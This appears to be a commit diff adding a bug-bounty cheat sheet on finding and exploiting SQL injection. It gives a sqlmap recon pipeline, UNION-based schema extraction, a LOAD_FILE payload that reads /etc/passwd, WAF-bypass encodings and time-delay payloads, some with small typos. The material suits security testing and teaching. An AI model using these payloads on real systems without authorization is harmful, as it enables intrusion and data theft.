|
| 1 | +Here are some quick methods to detect the SQL Injection vulnerability, though the methods are not limited. There are various tricks and tools. |
| 2 | + |
| 3 | +1. Using Burpsuite : |
| 4 | + |
| 5 | + 1. Capture the request using burpsuite. |
| 6 | + 2. Send the request to burp scanner. |
| 7 | + 3. Proceed with active scan. |
| 8 | + 4. Once the scan is finished, look for SQL vulnerability that has been detected. |
| 9 | + 5. Manually try SQL injection payloads. |
| 10 | + 6. Use SQLMAP to speed up the process. |
| 11 | + |
| 12 | +2. Using waybackurls and other bunch of tools : |
| 13 | + |
| 14 | + 1. sublist3r -d target | tee -a domains (you can use other tools like findomain, assetfinder, etc.) |
| 15 | + 2. cat domains | httpx | tee -a alive |
| 16 | + 3. cat alive | waybackurls | tee -a urls |
| 17 | + 4. gf sqli urls >> sqli |
| 18 | + 5. sqlmap -m sqli --dbs --batch |
| 19 | + 6. use tamper scripts |
| 20 | + |
| 21 | +3. Using heuristic scan to get hidden parameters : |
| 22 | + |
| 23 | + 1. Use subdomain enumeration tools on the domain. |
| 24 | + 2. Gather all urls using hakcrawler, waybackurls, gau for the domain and subdomains. |
| 25 | + 3. You can use the same method described above in 2nd point. |
| 26 | + 4. Use Arjun to scan for the hidden params in the urls. |
| 27 | + 5. Use --urls flag to include all urls. |
| 28 | + 6. Check the params as https://domain.com?<hiddenparam>=<value> |
| 29 | + 7. Send request to file and process it through sqlmap. |
| 30 | + |
| 31 | +4. Error generation with untrusted input or special characters : |
| 32 | + |
| 33 | + 1. Submit single quote character ' & look for errors. |
| 34 | + 2. Submit SQL specific query. |
| 35 | + 3. Submit Boolean conditions such as or 1=1 and or 1=0, and looking application's response. |
| 36 | + 4. Submit certain payloads that results in time delay. |
| 37 | + |
| 38 | +5. Finding total number of columns with order by or group by or having : |
| 39 | + |
| 40 | + Submit a series of ORDER BY clause such as |
| 41 | + |
| 42 | + ' ORDER BY 1 -- |
| 43 | + ' ORDER BY 2 -- |
| 44 | + ' ORDER BY 3 -- |
| 45 | + |
| 46 | + and incrementing specified column index until an error occurs. |
| 47 | + |
| 48 | +6. Finding vulnerable columns with union operator : |
| 49 | + |
| 50 | + Submit a series of UNION SELECT payloads. |
| 51 | + |
| 52 | + ' UNION SELECT NULL -- |
| 53 | + ' UNION SELECT NULL, NULL -- |
| 54 | + ' UNION SELECT NULL, NULL, NULL -- |
| 55 | + |
| 56 | + (Using NULL maximizes the probability that the payload will succeed. NULL can be converted to every commonly used data type.) |
| 57 | + |
| 58 | + To go for the methods in more detail, go through portswigger site. |
| 59 | + |
| 60 | + https://portswigger.net/web-security/sql-injection/union-attacks |
| 61 | + |
| 62 | +7. Extracting basic information like database(), version(), user(), UUID() with concat() or group_concat() |
| 63 | + |
| 64 | + 1. Database version |
| 65 | + |
| 66 | + Oracle SELECT banner FROM v$version |
| 67 | + SELECT version FROM v$instance |
| 68 | + |
| 69 | + Microsoft SELECT @@version |
| 70 | + |
| 71 | + PostgreSQL SELECT version() |
| 72 | + |
| 73 | + MySQL SELECT @@version |
| 74 | + |
| 75 | + 2. Database contents |
| 76 | + |
| 77 | + Oracle SELECT * FROM all_tables |
| 78 | + SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' |
| 79 | + |
| 80 | + Microsoft SELECT * FROM information_schema.tables |
| 81 | + SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| 82 | + |
| 83 | + PostgreSQL SELECT * FROM information_schema.tables |
| 84 | + SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| 85 | + |
| 86 | + MySQL SELECT * FROM information_schema.tables |
| 87 | + SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| 88 | + |
| 89 | + 3. Shows version, user and database name |
| 90 | + |
| 91 | + ' AND 1=2 UNION ALL SELECT concat_ws(0x3a,version(),user(),database()) |
| 92 | + |
| 93 | + 4. Using group_concat() function, used to concat all the rows of the returned results. |
| 94 | + |
| 95 | + ' union all select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()– |
| 96 | + |
| 97 | +8. Accessing system files with load_file(). and advance exploitation afterwards : |
| 98 | + |
| 99 | + ' UNION ALL SELECT LOAD_FILE ('/ etc / passwd') |
| 100 | + |
| 101 | +9. Bypassing WAF : |
| 102 | + |
| 103 | + 1. Using Null byte before SQL query. |
| 104 | + |
| 105 | + %00' UNION SELECT password FROM Users WHERE username-'xyz'-- |
| 106 | + |
| 107 | + 2. Using SQL inline comment sequence. |
| 108 | + |
| 109 | + '/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'xyz'-- |
| 110 | + |
| 111 | + 3. URL encoding |
| 112 | + |
| 113 | + for example : |
| 114 | + / URL encoded to %2f |
| 115 | + * URL encoded to %2a |
| 116 | + |
| 117 | + Can also use double encoding, if single encoding doesn't works. Use hex encoding if the rest doesn't work. |
| 118 | + |
| 119 | + 4. Changing Cases (uppercase/lowercase) |
| 120 | + |
| 121 | + For more step wise detailed methods, go through the link below. |
| 122 | + |
| 123 | + https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF |
| 124 | + |
| 125 | + 5. Use SQLMAP tamper scripts. It helps bypass WAF/IDS/IPS. |
| 126 | + |
| 127 | + 1. Use Atlas. It helps suggesting tamper scripts for SQLMAP. |
| 128 | + |
| 129 | + https://github.com/m4ll0k/Atlas |
| 130 | + |
| 131 | + 2. JHaddix post on SQLMAP tamper scripts. |
| 132 | + |
| 133 | + https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423 |
| 134 | + |
| 135 | +10. Time Delays : |
| 136 | + |
| 137 | + Oracle dbms_pipe.receive_message(('a'),10) |
| 138 | + |
| 139 | + Microsoft WAITFOR DELAY '0:0:10' |
| 140 | + |
| 141 | + PostgreSQL SELECT pg_sleep(10) |
| 142 | + |
| 143 | + MySQL SELECT sleep(10) |
| 144 | + |
| 145 | +11. Conditional Delays : |
| 146 | + |
| 147 | + Oracle SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual |
| 148 | + |
| 149 | + Microsoft IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10' |
| 150 | + |
| 151 | + PostgreSQL SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END |
| 152 | + |
| 153 | + MySQL SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a') |
| 154 | + |
| 155 | +12. Resources and tools that will help gain an upper hand on finding bugs : |
| 156 | + |
| 157 | + Portswigger SQL Injection cheat sheet - https://portswigger.net/web-security/sql-injection/cheat-sheet |
| 158 | + |
| 159 | + HTTPX - https://github.com/encode/httpx |
| 160 | + |
| 161 | + GF patterns - https://github.com/1ndianl33t/Gf-Patterns |
| 162 | + |
| 163 | + GF (Tomnomnom)- https://github.com/tomnomnom/gf |
| 164 | + |
| 165 | + We can also use gau with waybackurls to fetch all urls. |
| 166 | + |
| 167 | + Waybackurls - https://github.com/tomnomnom/waybackurls |
| 168 | + |
| 169 | + Gau - https://github.com/lc/gau |
| 170 | + |
| 171 | + Arjun - https://github.com/s0md3v/Arjun |
| 172 | + |
| 173 | + Hakcrawler - https://github.com/hakluke/hakrawler |
| 174 | + |
| 175 | + |
0 commit comments